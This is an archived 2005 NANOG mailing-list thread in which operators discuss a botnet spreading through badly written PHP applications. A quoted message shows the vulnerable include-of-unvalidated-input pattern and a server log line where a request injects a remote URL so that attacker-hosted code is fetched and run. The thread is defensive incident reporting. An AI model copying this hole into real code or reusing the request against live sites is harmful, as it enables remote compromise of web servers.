[87536] in North American Network Operators' Group

home help back first fref pref prev next nref lref last post

RE: Re:Destructive botnet originating from Japan

daemon@ATHENA.MIT.EDU (Hannigan, Martin)
Fri Dec 23 19:54:01 2005

Date: Fri, 23 Dec 2005 19:53:32 -0500
From: "Hannigan, Martin" <hannigan@verisign.com>
To: <nanog@merit.edu>
Errors-To: owner-nanog@merit.edu


This is a multi-part message in MIME format.

------_=_NextPart_001_01C60824.76659E4E
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


You'd think nsp-sec people would try and get nsp-jp involved. Oh, there =
is no nsp-jp, or skooter 15. :)





 -----Original Message-----
From: 	Barrett G. Lyon [mailto:blyon@prolexic.com]
Sent:	Fri Dec 23 19:21:47 2005
To:	nanog@merit.edu
Subject:	Re:Destructive botnet originating from Japan


Well it appears that bad code always seems to be the root of =20
problems, according to our research today the problem appears to be =20
caused by incorrectly written PHP applications that perform includes =20
using a string without running any validation against the string:

index.php?test=3Dtest
$test=3D$_GET[test];
include("$test.php");

When the include executes the test string passed from the GET =20
includes execution instructions:

       "GET /index.php?test=3Dhttp%3A//210.170.60.2/....? HTTP/1.0" 200  =

8010 "-" "Wget/1.6"

It appears that the attacker at 210.170.60.2 (also the botnet hosting =20
IRC server) is spreading his code as the include is called, pulling =20
and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this =20
list, but it's pretty nasty.


-Barrett






------_=_NextPart_001_01C60824.76659E4E
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>RE: Re:Destructive botnet originating from Japan</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<BR>

<P><FONT SIZE=3D2>You'd think nsp-sec people would try and get nsp-jp =
involved. Oh, there is no nsp-jp, or skooter 15. :)<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
&nbsp;-----Original Message-----<BR>
From: &nbsp; Barrett G. Lyon [<A =
HREF=3D"mailto:blyon@prolexic.com">mailto:blyon@prolexic.com</A>]<BR>
Sent:&nbsp;&nbsp; Fri Dec 23 19:21:47 2005<BR>
To:&nbsp;&nbsp;&nbsp;&nbsp; nanog@merit.edu<BR>
Subject:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Re:Destructive botnet =
originating from Japan<BR>
<BR>
<BR>
Well it appears that bad code always seems to be the root of&nbsp;<BR>
problems, according to our research today the problem appears to =
be&nbsp;<BR>
caused by incorrectly written PHP applications that perform =
includes&nbsp;<BR>
using a string without running any validation against the string:<BR>
<BR>
index.php?test=3Dtest<BR>
$test=3D$_GET[test];<BR>
include(&quot;$test.php&quot;);<BR>
<BR>
When the include executes the test string passed from the GET&nbsp;<BR>
includes execution instructions:<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;GET =
/index.php?test=3Dhttp%3A//210.170.60.2/....? HTTP/1.0&quot; =
200&nbsp;<BR>
8010 &quot;-&quot; &quot;Wget/1.6&quot;<BR>
<BR>
It appears that the attacker at 210.170.60.2 (also the botnet =
hosting&nbsp;<BR>
IRC server) is spreading his code as the include is called, =
pulling&nbsp;<BR>
and executing PHP code from a remote server that injects the =
software.<BR>
<BR>
I'm not sure if this needs to be alerted to anyone outside of =
this&nbsp;<BR>
list, but it's pretty nasty.<BR>
<BR>
<BR>
-Barrett<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>
------_=_NextPart_001_01C60824.76659E4E--

home help back first fref pref prev next nref lref last post